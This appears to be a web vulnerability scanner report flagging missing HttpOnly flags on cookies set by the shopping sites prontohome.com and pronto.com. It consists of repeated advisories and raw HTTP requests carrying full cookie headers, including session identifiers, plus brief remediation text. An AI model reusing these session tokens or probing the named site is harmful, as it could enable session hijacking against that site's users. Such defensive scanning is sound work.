The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bath-towels HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bathroom-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bathroom-lighting HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bed HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bed-sheets HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bedroom-and-bathroom-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bedskirts HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blankets-and-throws HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /comforters HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /coverlets-and-quilts HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cutlery HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dining HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dining-and-kitchen-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dinnerware HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /duvets HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /entryway-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /flatware HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /glassware-and-drinkware HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-office-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kitchen HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kitchen-electrics HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kitchen-storage-and-organization HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kitchen-textiles HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kitchen-tools HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lighting HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /living-room-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /outdoor-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pillows HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pots-pans-and-skillets HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /serveware HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shams HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shower-curtains HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /table-lamps HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /table-linens-and-decor HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?mid=41048ba4-12e1505343e-294f HTTP/1.1 Host: www.pronto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /discount-barbecue-grills-v1_4_50_270-cs HTTP/1.1 Host: www.pronto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /productRedirection.do?exitPoint=disambiguated-search&merchantProductId=1688692330µsiteId=pronto_style&mid=4462231-12e14ffec7a-48f9&nlCellNum=0&pageLocation=gridProductImage5&parentId=35a611ad-12e151753d5--3ea0&shouldLookupGuidesterCpc=true HTTP/1.1 Host: www.pronto.com Proxy-Connection: keep-alive Referer: http://www.prontostyle.com/prodRedirExitInterst.do?exitPoint=disambiguated-search&merchantProductId=1688692330&pageLocation=gridProductImage5&parentId=35a611ad-12e151753d5--3ea0&shouldLookupGuidesterCpc=true Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: V9Q1=3nzgaDHtoPhvmtU4ci8dAjhKb0hwu4DL4JGwutdw3oCfywvv2ADV8Ug
